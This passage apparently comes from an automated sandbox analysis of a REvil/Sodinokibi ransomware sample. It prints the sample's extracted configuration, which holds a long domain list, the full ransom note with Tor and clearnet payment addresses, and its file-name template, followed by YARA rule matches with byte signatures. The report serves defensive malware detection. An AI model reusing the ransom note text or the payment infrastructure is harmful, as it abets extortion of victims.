.dk;boomerslivinglively.com;thegetawaycollective.com;90nguyentuan.com;cesep2019.com;craftingalegacy.com;amorbellezaysalud.com;memphishealthandwellness.com;carolynfriedlander.com;paardcentraal.nl;smarttourism.academy;ingresosextras.online;kombi-dress.com;blueridgeheritage.com;ntinasfiloxenia.gr;zwemofficial.nl;gavelmasters.com;hostaletdelsindians.es;jefersonalessandro.com;opt4cdi.com;cap29010.it;tesisatonarim.com;eventosvirtualesexitosos.com;strauchs-wanderlust.info;denverwynkoopdentist.com;hutchstyle.co.uk;krishnabrawijaya.com;globalcompliancenews.com;imaginekithomes.co.nz;skyboundnutrition.co.uk;stringnosis.academy;fysiotherapierijnmond.nl;rolleepollee.com;mrcar.nl;goddardleadership.org;geitoniatonaggelon.gr;cops4causes.org;chris-anne.com;bayshoreelite.com;imagine-entertainment.com;oscommunity.de;fanuli.com.au;jayfurnitureco.com;mindsparkescape.com;crestgood.com;bulyginnikitav.000webhostapp.com;thisprettyhair.com;cyberpromote.de;marmarabasin.com;gazelle-du-web.com;tetameble.pl;zumrutkuyutemel.com;hepishopping.com;brannbornfastigheter.se;wribrazil.com;heuvelland-oaze.nl;dibli.store;k-zubki.ru;pays-saint-flour.fr;dinecorp.com;khtrx.com;maryairbnb.wordpress.com;artvark.nl;richardmaybury.co.uk;circlecitydj.com;makingmillionaires.net;comoserescritor.com;efficiencyconsulting.es;rivermusic.nl;chomiksy.net;jag.me;photonag.com;ravage-webzine.nl;studionumerik.fr;parentsandkids.com;verbouwingsdouche.nl;charlesfrancis.photos;natturestaurante.com.br;goodherbalhealth.com;linearete.com;bychowo.pl;aidanpublishing.co.uk;schlagbohrmaschinetests.com;buffdaddyblog.com;mindfuelers.com;optigas.com;biketruck.de;envomask.com;welovecustomers.fr;andreaskildegaard.dk;haus-landliebe.de;christianscholz.de;jobscore.com;subyard.com;cincinnatiphotocompany.org;bjornvanvulpen.nl;xn--80abehgab4ak0ddz.xn--p1ai;lookandseen.com;thesilkroadny.com;eatyoveges.com;muller.nl;hospitalitytrainingsolutions.co.uk;markseymourphotography.co.uk;claudiakilian.de;2020hindsight.info;victorvictoria.com;elitkeramika-shop.com.ua;turing.academy;aceroprime.com;animalfood-online.de;leijstrom.com;kamin-somnium.de;ziliak.com;werkzeugtrolley.net;csaballoons.com;enactusnhlstenden.com;atrgroup.it;c-sprop.com;enews-qca.com;michaelfiegel.com;theatre-embellie.fr;mercadodelrio.com;adaduga.info;magrinya.net;ramirezprono.com;landgoedspica.nl;a-zpaperwork.eu;grancanariaregional.com;bridalcave.com;global-migrate.com;michal-s.co.il;omnicademy.com;holocine.de;sellthewrightway.com;magnetvisual.com;lexced.com;hostastay.com;kosten-vochtbestrijding.be;tastevirginia.com;gbk-tp1.de;oraweb.net;designimage.ae;trevi-vl.ru;futurenetworking.com;banksrl.co.za;fixx-repair.com;hotjapaneselesbian.com;afbudsrejserallinclusive.dk;breakluckrecords.com;endstarvation.com;kroophold-sjaelland.dk;heimdalbygg.no;broccolisoep.nl;uci-france.fr;fsbforsale.com;achetrabalhos.com;xn--80addfr4ahr.dp.ua;istantidigitali.com;eurethicsport.eu;alabamaroofingllc.com;biblica.com;bagaholics.in;hom-frisor.dk;devplus.be;koncept-m.ru;guohedd.com;latteswithleslie.com;mediahub.co.nz;photographycreativity.co.uk;burg-zelem.de;pokemonturkiye.com;frankgoll.com;bluemarinefoundation.com;renderbox.ch;kerstliedjeszingen.nl;operativadigital.com;physio-lang.de;annida.it;mursall.de;bescomedical.de;cc-experts.de;awaitspain.com;alpesiberie.com;piestar.com;kdbrh.com;groovedealers.ru;watchsale.biz;directique.com;kompresory-opravy.com;transifer.fr;affligemsehondenschool.be;autoteamlast.de;nrgvalue.com;duthler.nl;aslog.fr;nutriwell.com.sg;spectamarketingdigital.com.br;amco.net.au;tweedekansenloket.nl;ahgarage.com;askstaffing.com;justaroundthecornerpetsit.com;the-beauty-guides.com;sycamoregreenapts.com;latableacrepes-meaux.fr;belinda.af;solidhosting.nl;topautoinsurers.net;pvandambv.nl;forskolinslimeffect.net;pharmeko-group.com;cuadc.org;sharonalbrightdds.com;cardsandloyalty.com;tchernia-conseil.fr;opticahubertruiz.com;adterium.com;myplaywin3.com;blavait.fr;mediogiro.com.ar;ivancacu.com;kookooo.com;mazift.dk;livedeveloper.com;curtsdiscountguns.com;lyricalduniya.com;jlgraphisme.fr;creohn.de;vapiano.fr;lollachiro.com;t3brothers.com;rizplakatjaya.com;four-ways.com;polynine.com;ox-home.com;levelseven.be;raeoflightmusic.com;teutoradio.de;circuit-diagramz.com;lapponiasafaris.com;citiscapes-art.com;apogeeconseils.fr;the3-week-diet.net;brighthillgroup.com;mariannelemenestrel.com;soundseeing.net;randyabrown.com;queertube.net;eos-horlogerie.com;martha-frets-ceramics.nl;molinum.pt;qandmmusiccenter.com;explora.nl;profiz.com;ayudaespiritualtamara.com;cssp-mediation.org;collegetennis.info;mieleshopping.it;atelierkomon.com;fla.se;jobkiwi.com.ng;gratiocafeblog.wordpress.com;lifeinbreaths.com;naukaip.ru;zaczytana.com;n-newmedia.de;campusce.com;beauty-traveller.com;linkbuilding.life;bundan.com;greatofficespaces.net;ikzoekgod.be;allinonecampaign.com;radishallgood.com;bookingwheel.com;specialtyhomeservicesllc.com;alisodentalcare.com;oportowebdesign.com;whoopingcrane.com;pilotgreen.com;neonodi.be;omegamarbella.com;kiraribeaute-nani.com;newonestop.com;motocrossplace.co.uk;pubcon.com;riffenmattgarage.ch;theboardroomafrica.com;glennverschueren.be;fazagostar.co;atma.nl;lisa-poncon.fr;projektparkiet.pl;jandhpest.com;andrealuchesi.it;galaniuklaw.com;digitale-elite.de;ketomealprep.academy;cormanmarketing.com;nginx.com;fotoeditores.com;1deals.com;11.in.ua;flossmoordental.com;orchardbrickwork.com;glende-pflanzenparadies.de;alwaysdc.com;cleanroomequipment.ie;janellrardon.com;ddmgen.com;ruggestar.ch;ncn.nl;campinglaforetdetesse.com;ziliak.com;thegrinningmanmusical.com;ilveshistoria.com;customroasts.com;bluelakevision.com;oexebusiness.com;asiaartgallery.jp;vitormmcosta.com;metcalfe.ca;palmecophilippines.com;mariamalmahdi.com;hawaiisteelbuilding.com;olry-cloisons.fr;vitoriaecoturismo.com.br;bakingismyyoga.com;myfbateam.com;onesynergyinternational.com;webforsites.com;zdrowieszczecin.pl;premier-iowa.com;wordpress.idium.no;nieuwsindeklas.be;dcc-eu.com;drbrianhweeks.com;innersurrection.com;hm-com.com;test-teleachat.fr;letterscan.de;mangimirossana.it;o90.dk;mensemetgesigte.co.za;stitch-n-bitch.com;easydental.ae;ijsselbeton.nl;palmenhaus-erfurt.de;mundo-pieces-auto.fr;birthplacemag.com;fridakids.com;juergenblaetz.de;ziliak.com;sealgrinderpt.com;finnergo.eu;energosbit-rp.ru;trainiumacademy.com;epicjapanart.com;signamedia.de;profibersan.com;tellthebell.website;springfieldplumbermo.com;larchwoodmarketing.com;suitesartemis.gr;bertbutter.nl;medicalsupportco.com;molade.nl;mondolandscapes.com;alexwenzel.de;drbenveniste.com;boloria.de;aheadloftladders.co.uk;stage-infirmier.fr;dantreranch.com;citydogslife.com;johnkoen.com;sachainchiuk.com;sshomme.com;initconf.com;martinipstudios.com;skooppi.fi;catering.com;saint-malo-developpement.fr;mariajosediazdemera.com;campusescalade.com;uncensoredhentaigif.com;auto-opel.ro;dennisverschuur.com;berdonllp.com;maxcube24.com.ua;pinthelook.com;advanced-removals.co.uk;jacquesgarcianoto.com;ced-elec.com;sochi-okna23.ru;pansionatblago.ru;malevannye.ru;banukumbak.com;rozmata.com;fascaonline.com;bcmets.info;mslp.org;perfectgrin.com;tramadolhealth.com;clinic-beethovenstrasse-ag.ch;skyscanner.ro;bodymindchallenger.com;rokthetalk.com;furland.ru;datatri.be;traitware.com;chorusconsulting.net;akwaba-safaris.com;avis.mantova.it;thepixelfairy.com;patassociation.com;factorywizuk.com;muni.pe;manzel.tn;iron-mine.ru;julielusktherapy.com;3daywebs.com;weddingceremonieswithtim.com;onlinetvgroup.com;billyoart.com;colored-shelves.com;tzn.nu;annenymus.com;xtensifi.com;finsahome.co.uk;narca.net;prodentalblue.com;centuryvisionglobal.com;hawthornsretirement.co.uk;wyreforest.net;simpleitsolutions.ch;foerderverein-vatterschule.de;reygroup.pt;ideamode.com;lashandbrowenvy.com;tutvracks.com;thestudio.academy;stanleyqualitysystems.com;ledyoucan.com;entdoctor-durban.com;goeppinger-teppichreinigung.de;parksideseniorliving.net;aciscomputers.com;cascinarosa33.it;apmollerpension.com;triplettabordeaux.fr;cymru.futbol;miscbo.it;licensed-public-adjuster.com;arabianmice.com;speakaudible.com;littlesaints.academy;nourella.com;deziplan.ru;hostingbangladesh.net;frameshift.it;protoplay.ca;min-virksomhed.dk;direitapernambuco.com;harleystreetspineclinic.com;redpebblephotography.com;beandrivingschool.com.au;stathmoulis.gr;happycatering.de;netadultere.fr;mustangmarketinggroup.com;evsynthacademy.org;m2graph.fr;site.markkit.com.br;arazi.eus;stressreliefadvice.com;internestdigital.com;wasnederland.nl;domilivefurniture.com;der-stempelking.de;5thactors.com;hoteltantra.com;boyfriendsgoal.site;bendel-partner.de;paradigmlandscape.com;nexstagefinancial.com;zinnystar.com;professionetata.com;happylublog.wordpress.com;moira-cristescu.com;rhino-storage.co.uk;carsten.sparen-it.de;die-immo-agentur.de;nalliasmali.net;lovcase.com;factoriareloj.com;sweetz.fr;bodet150ans.com;qwikcoach.com;schroederschoembs.com;tages-geldvergleich.de;glas-kuck.de;fotoslubna.com;azerbaycanas.com;bohrlochversicherung.info;laaisterplakky.nl;production-stills.co.uk;scotlandsroute66.co.uk;shrinkingplanet.com;agendatwentytwenty.com;spirello.nl;singletonfinancial.com;kryddersnapsen.dk;girlish.ae;levencovka.ru;nationnewsroom.com;santastoy.store;cp-bap.de;ocduiblog.com;andermattswisswatches.ch;pinkxgayvideoawards.com;descargandoprogramas.com;apiarista.de;5pointpt.com;lgiwines.com;rossomattonecase.it;powershell.su;premiumweb.com.ua:443;oro.ae;ikadomus.com;ygallerysalonsoho.com:443;ronielyn.com;brisbaneosteopathic.com.au;pourlabretagne.bzh;metroton.ru;richardiv.com;putzen-reinigen.com;metriplica.academy;fitnessblenderstory.com;lassocrm.com;hensleymarketing.com;b3b.ch;louiedager.com;yvesdoin-aquarelles.fr;nicksrock.com;log-barn.co.uk;scentedlair.com;xrresources.com;promus.ca;logosindustries.com;airvapourbarrier.com;sppdstats.com;rhino-turf.com;catchup-mag.com;noda.com.ua;motocrosshideout.com;fta-media.com;tbalp.co.uk;brunoimmobilier.com;valiant-voice.com;leopoldineroux.com;loysonbryan.com;schulz-moelln.de;geoweb.software;eksperdanismanlik.com;artcase.pl;tatyanakopieva.ru;jdscenter.com;ruggestar.ch;elex.is;tilldeeke.de;ncjc.ca;framemyballs.com;alltagsrassismus-entknoten.de;christopherhannan.com;yuanshenghotel.com;prometeyagro.com.ua;albcleaner.fr;smartmind.net;xn--ziinoapte-6ld.ro;gosouldeep.com;reizenmetkinderen.be;mrmac.com;airserviceunlimited.com;globalskills.pt;nuohous.com;gsconcretecoatings.com;ykobbqchicken.ca;yourcosmicbeing.com;greenrider.nl;internalresults.com;subquercy.fr;liverpoolabudhabi.ae;the5thquestion.com;osn.ro;tanatek.com;nepressurecleaning.com;universelle.fr;jameswilliamspainting.com;nxtstg.org;elliemaccreative.wordpress.com;witraz.pl;rechtenplicht.be;agriturismocastagneto.it;antesacademy.it;encounter-p.net;primemarineengineering.com;sveneulberg.de;texanscan.org;sarahspics.co.uk;rename.kz;leloupblanc.gr;ceocenters.com;perceptdecor.com;luvbec.com;salonlamar.nl;kvetymichalovce.sk;qrs-international.com;janasfokus.com;topvijesti.net;worldproskitour.com;wineandgo.hu;hameghlim.com;line-x.co.uk;mikegoodfellow.co.uk;tradenavigator.ch;indiebizadvocates.org;rvside.com;clemenfoto.dk;stabilisateur.fr;belofloripa.be;tecleados.com;bd2fly.com;gardenpartner.pl;hvitfeldt.dk;teamsegeln.ch;angelika-schwarz.com;suonenjoen.fi;kartuindonesia.com;startuplive.org;parseport.com;agenceassemble.fr;altitudeboise.com;egpu.fr;anleggsregisteret.no;bellesiniacademy.org;sjtpo.org;kafkacare.com;adedesign.com;haard-totaal.nl;saberconcrete.com;rishigangoly.com;alattekniksipil.com;vdolg24.online;dentourage.com;billscars.net;devus.de;dogsunlimitedguide.com;dentalcircle.com;astrographic.com;wademurray.com;bourchier.org;alene.co;bruut.online;jaaphoekzema.nl;limounie.com;slideevents.be;mind2muscle.nl;hypogenforensic.com;cainlaw-okc.com;mbuildinghomes.com;carmel-york.com;edvestors.org;unislaw-narty.pl;from02pro.com;cotton-avenue.co.il;speiserei-hannover.de;dierenambulancealkmaar.nl;slotenmakerszwijndrecht.nl;interlinkone.com;breathebettertolivebetter.com;triplettagaite.fr;itheroes.dk;bringmehope.org;ya-elka.ru;advancedeyecare.com;ebible.co;bg.szczecin.pl;solutionshosting.co.uk;skidpiping.de;mediabolmong.com;vipcarrental.ae;zorgboerderijravensbosch.nl;luvinsburger.fr;altocontatto.net;leatherjees.com;masecologicos.com;kristianboennelykke.dk;teethinadaydentalimplants.com;phukienbepthanhdat.com", "net": true, "nbody": "---=== Welcome. Again. ===---\r\n\r\n[+] Whats Happen? [+]\r\n\r\nYour files are encrypted, and currently unavailable. You can check it: all files on you computer has expansion {EXT}.\r\nBy the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).\r\n\r\n[+] What guarantees? [+]\r\n\r\nIts just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.\r\nTo check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.\r\nIf you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.\r\n\r\n[+] How to get access on website? [+]\r\n\r\nYou have two ways:\r\n\r\n1) [Recommended] Using a TOR browser!\r\n  a) Download and install TOR browser from this site: https://torproject.org/\r\n  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}\r\n\r\n2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:\r\n  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)\r\n  b) Open our secondary website: http://decryptor.top/{UID}\r\n\r\nWarning: secondary website can be blocked, thats why first variant much better and more available.\r\n\r\nWhen you open our website, put the following data in the input form:\r\nKey:\r\n\r\n{KEY}\r\n\r\n\r\nExtension name:\r\n\r\n{EXT}\r\n\r\n-----------------------------------------------------------------------------------------\r\n\r\n!!! DANGER !!!\r\nDONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.\r\n!!! !!! !!!\r\nONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.\r\n!!! !!! !!!\u0000", "nname": "{EXT}-readme.txt", "exp": false, "img": "QQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA"}
SourceRuleDescriptionAuthorStrings
RQzHm5vLxs.exeJoeSecurity_RevilYara detected RevilJoe Security
    RQzHm5vLxs.exeWindows_Ransomware_Sodinokibi_83f05fbeIdentifies SODINOKIBI/REvil ransomwareunknown
    • 0x84bc:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ...
    • 0x17340:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B
    • 0x81f6:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ...
    • 0x917b:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ...
    • 0x8e9c:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ...
    • 0x8071:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ...
    • 0x8e09:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ...
    • 0x19e00:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35
    • 0x926c:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ...
    • 0x819c:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ...
    • 0x8c65:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0
    • 0x90e5:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A
    • 0x8144:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2
    • 0x88b7:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
    RQzHm5vLxs.exeWindows_Ransomware_Sodinokibi_a282ba44Identifies SODINOKIBI/REvil ransomwareunknown
    • 0x3db0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83
    • 0x497c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF
    • 0x5b27:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55
    • 0x8e8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F
    • 0x948e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89
    • 0xa526:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
    RQzHm5vLxs.exeREvilREvil PayloadR3MRUM
    • 0x17340:$RE1: expand 32-byte kexpand 16-byte k
    • 0xba30:$RE2: sysshadow
    • 0x105f8:$RE2: sysshadow
    • 0x14270:$RE2: sysshadow
    • 0xba50:$RE3: SCROLLBAR
    • 0x10610:$RE3: SCROLLBAR
    • 0x14288:$RE3: SCROLLBAR
    • 0xba40:$RE4: msctfime ui
    • 0x10604:$RE4: msctfime ui
    • 0x1427c:$RE4: msctfime ui
    • 0xba60:$RE5: \BaseNamedObjects\%S
    • 0x1061c:$RE5: \BaseNamedObjects\%S
    • 0x14294:$RE5: \BaseNamedObjects\%S
    • 0x4d34:$decode: 33 D2 8A 9C 3D FC FE FF FF 8B C7 0F B6 CB F7 75 0C 8B 45 08 0F B6 04 02 03 C6 03 C8 0F B6 F1 8A 84 35 FC FE FF FF 88 84 3D FC FE FF FF 47 88 9C 35 FC FE FF FF 81 FF 00 01 00 00 72 C3
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2926693193.0000000000D91000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Sodinokibi_a282ba44Identifies SODINOKIBI/REvil ransomwareunknown
    • 0x39b0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83
    • 0x457c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF
    • 0x5727:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55
    • 0x8a8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F
    • 0x908e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89
    • 0xa126:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
    00000000.00000000.1664633895.0000000000D91000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Sodinokibi_a282ba44Identifies SODINOKIBI/REvil ransomwareunknown
    • 0x39b0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83
    • 0x457c:$c4: 0C 8B 04 B0 83 78 04 05 75 1C FF 70 08 FF 70 0C FF 75 0C FF
    • 0x5727:$c5: FB 8B 45 FC 50 8B 08 FF 51 08 5E 8B C7 5F 5B 8B E5 5D C3 55
    • 0x8a8c:$c6: BC 00 00 00 33 D2 8B 4D F4 8B F1 8B 45 F0 0F A4 C1 01 C1 EE 1F
    • 0x908e:$c7: 54 8B CE F7 D1 8B C2 23 4D DC F7 D0 33 4D F4 23 C7 33 45 E8 89
    • 0xa126:$c8: 0C 89 46 0C 85 C0 75 2A 33 C0 EB 6C 8B 46 08 85 C0 74 62 6B
    Process Memory Space: RQzHm5vLxs.exe PID: 6232JoeSecurity_Ransomware_GenericYara detected Ransomware_GenericJoe Security
      Process Memory Space: RQzHm5vLxs.exe PID: 6232JoeSecurity_Conti_ransomwareYara detected Conti ransomwareJoe Security
        Process Memory Space: RQzHm5vLxs.exe PID: 6232JoeSecurity_ChaosYara detected Chaos RansomwareJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.0.RQzHm5vLxs.exe.d90000.0.unpackJoeSecurity_RevilYara detected RevilJoe Security
            0.0.RQzHm5vLxs.exe.d90000.0.unpackWindows_Ransomware_Sodinokibi_83f05fbeIdentifies SODINOKIBI/REvil ransomwareunknown
            • 0x84bc:$d1: 03 C0 01 47 30 11 4F 34 01 57 30 8B 57 78 8B C2 11 77 34 8B 77 7C 8B CE 0F A4 C1 04 C1 E0 04 01 47 28 8B C2 11 4F 2C 8B CE 0F A4 C1 01 03 C0 01 47 28 11 4F 2C 01 57 28 8B 57 70 8B C2 11 77 2C ...
            • 0x17340:$d2: 65 78 70 61 6E 64 20 33 32 2D 62 79 74 65 20 6B 65 78 70 61 6E 64 20 31 36 2D 62 79 74 65 20 6B
            • 0x81f6:$d3: F7 6F 38 03 C8 8B 43 48 13 F2 F7 6F 20 03 C8 8B 43 38 13 F2 F7 6F 30 03 C8 8B 43 40 13 F2 F7 6F 28 03 C8 8B 43 28 13 F2 F7 6F 40 03 C8 8B 45 08 13 F2 89 48 68 89 70 6C 8B 43 38 F7 6F 38 8B C8 ...
            • 0x917b:$d4: 33 C0 8B 5A 68 8B 52 6C 0F A4 FE 08 C1 E9 18 0B C6 C1 E7 08 8B 75 08 0B CF 89 4E 68 8B CA 89 46 6C 33 C0 8B 7E 60 8B 76 64 0F A4 DA 19 C1 E9 07 0B C2 C1 E3 19 8B 55 08 0B CB 89 4A 60 8B CF 89 ...
            • 0x8e9c:$d5: C1 01 C1 EE 1F 0B D1 03 C0 0B F0 8B C2 33 43 24 8B CE 33 4B 20 33 4D E4 33 45 E0 89 4B 20 8B CB 8B 5D E0 89 41 24 8B CE 33 4D E4 8B C2 31 4F 48 33 C3 8B CF 31 41 4C 8B C7 8B CE 33 48 70 8B C2 ...
            • 0x8071:$d6: 8B 43 40 F7 6F 08 03 C8 8B 03 13 F2 F7 6F 48 03 C8 8B 43 48 13 F2 F7 2F 03 C8 8B 43 08 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 18 03 C8 8B 43 18 13 F2 F7 6F 30 03 C8 8B 43 38 13 F2 F7 6F 10 ...
            • 0x8e09:$d7: 8B CE 33 4D F8 8B C2 33 C3 31 4F 18 8B CF 31 41 1C 8B C7 8B CE 33 48 40 8B C2 33 4D F8 33 47 44 89 4F 40 33 C3 8B CF 89 41 44 8B C7 8B CE 33 48 68 8B C2 33 47 6C 33 4D F8 33 C3 89 4F 68 8B CF ...
            • 0x19e00:$d8: 36 7D 49 30 85 35 C2 C3 68 60 4B 4B 7A BE 83 53 AB E6 8E 42 F9 C6 62 A5 D0 6A AD C6 F1 7D F6 1D 79 CD 20 FC E7 3E E1 B8 1A 43 38 12 C1 56 28 1A 04 C9 22 55 E0 D7 08 BB 9F 0B 1F 1C B9 13 06 35
            • 0x926c:$d9: C2 C1 EE 03 8B 55 08 0B CE 89 4A 4C 8B CF 89 42 48 33 C0 8B 72 30 8B 52 34 C1 E9 0C 0F A4 DF 14 0B C7 C1 E3 14 8B 7D 08 0B CB 89 4F 30 8B CE 89 47 34 33 C0 C1 E1 0C 0F AC D6 14 0B C6 C1 EA 14 ...
            • 0x819c:$d10: 8B F2 8B 43 38 F7 6F 28 03 C8 8B 43 18 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 38 03 C8 8B 43 40 13 F2 F7 6F 20 0F A4 CE 01 03 C9 03 C8 8B 43 20 13 F2 F7 6F 40 03 C8 8B 43 30 13 F2 F7 6F 30 ...
            • 0x8c65:$d11: 33 45 FC 31 4B 28 8B CB 31 41 2C 8B CE 8B C3 33 48 50 8B C2 33 43 54 33 CF 33 45 FC 89 4B 50 8B CB 89 41 54 8B CE 8B C3 33 48 78 8B C2 33 43 7C 33 CF 33 45 FC 89 4B 78 8B CB 89 41 7C 33 B1 A0
            • 0x90e5:$d12: 52 24 0F A4 FE 0E C1 E9 12 0B C6 C1 E7 0E 8B 75 08 0B CF 89 4E 20 8B CA 89 46 24 33 C0 8B 7E 78 8B 76 7C 0F A4 DA 1B C1 E9 05 0B C2 C1 E3 1B 8B 55 08 0B CB 89 4A 78 8B CF 89 42 7C 33 C0 8B 9A
            • 0x8144:$d13: F2 8B 43 38 F7 6F 20 03 C8 8B 43 40 13 F2 F7 6F 18 03 C8 8B 43 10 13 F2 F7 6F 48 03 C8 8B 43 28 13 F2 F7 6F 30 03 C8 8B 43 20 13 F2 F7 6F 38 03 C8 8B 43 30 13 F2 F7 6F 28 03 C8 8B 43 48 13 F2
            • 0x88b7:$d14: 8B 47 30 13 F2 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 74 03 C9 89 4B 70 8B 47 30 F7 6F 48 8B C8 8B F2 8B 47 38 F7 6F 40 03 C8 13 F2 0F A4 CE 01 89 73 7C 03 C9 89 4B 78 8B 47 38 F7 6F 48 8B C8
            0.0.RQzHm5vLxs.exe.d90000.0.unpackWindows_Ransomware_Sodinokibi_a282ba44Identifies SODINOKIBI/REvil ransomwareunknown
            • 0x3db0:$c3: 75 0C 72 D3 33 C0 40 5F 5E 5B 8B E5 5D C3 33 C0 EB F5 55 8B EC 83
